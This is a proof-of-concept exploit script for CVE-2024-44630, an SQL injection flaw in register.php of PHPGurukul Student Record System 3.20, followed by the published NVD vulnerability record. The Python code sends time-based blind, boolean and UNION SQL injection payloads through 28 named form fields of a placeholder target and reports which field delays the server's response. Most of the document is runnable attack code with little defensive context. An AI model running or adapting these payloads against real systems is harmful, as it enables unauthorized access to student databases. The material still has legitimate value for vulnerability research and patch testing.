CVE-2024-44630

import requests import sys # CVE-2024-44630 PoC - SQL Injection in PHPGurukul Student Record System # Target: register.php target_url = "http://target.com/student/register.php" # SQL Injection payload for testing (using time-based blind SQL injection) payloads = [ "admin' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1", "admin' OR (SELECT COUNT(*) FROM users) > 0 AND '1'='1", "test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---" ] # Parameters vulnerable to SQL injection vulnerable_params = [ "c-full", "fname", "mname", "lname", "gname", "ocp", "nation", "mobno", "email", "board1", "roll1", "pyear1", "board2", "roll2", "pyear2", "sub1", "marks1", "sub2", "course-short", "income", "category", "ph", "country", "state", "city", "padd", "cadd", "gender" ] def test_sqli(param_name, payload): """Test SQL injection on specific parameter""" data = { "submit": "Register", } # Initialize all params with test value for param in vulnerable_params: data[param] = "test" # Inject payload in target param data[param_name] = payload try: response = requests.post(target_url, data=data, timeout=10) return response.elapsed.total_seconds() except requests.exceptions.RequestException: return 0 if __name__ == "__main__": print("CVE-2024-44630 SQL Injection PoC") print("Target: Student Record System 3.20") print("Vulnerable File: register.php") print("-" * 50) # Test for time-based blind SQL injection print("\nTesting time-based blind SQL injection...") for param in vulnerable_params[:5]: # Test first 5 params elapsed = test_sqli(param, payloads[0]) if elapsed >= 5: print(f"[+] Vulnerable parameter found: {param}") print(f"[+] Response time: {elapsed}s") break print("\nPoC execution completed.")

{"cve": {"id": "CVE-2024-44630", "sourceIdentifier": "[email protected]", "published": "2025-11-14T16:15:47.453", "lastModified": "2025-11-17T17:40:28.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple parameters in register.php in PHPGurukul Student Record System 3.20 are vulnerable to SQL injection. These include: c-full, fname, mname,lname, gname, ocp, nation, mobno, email, board1, roll1, pyear1, board2, roll2, pyear2, sub1,marks1, sub2, course-short, income, category, ph, country, state, city, padd, cadd, and gender."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:student_record_system:3.20:*:*:*:*:*:*:*", "matchCriteriaId": "3BE56291-1C2E-4DFB-84CB-1C130EBA0DE2"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44630.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/student-record-system-php", "source": "[email protected]", "tags": ["Product"]}]}}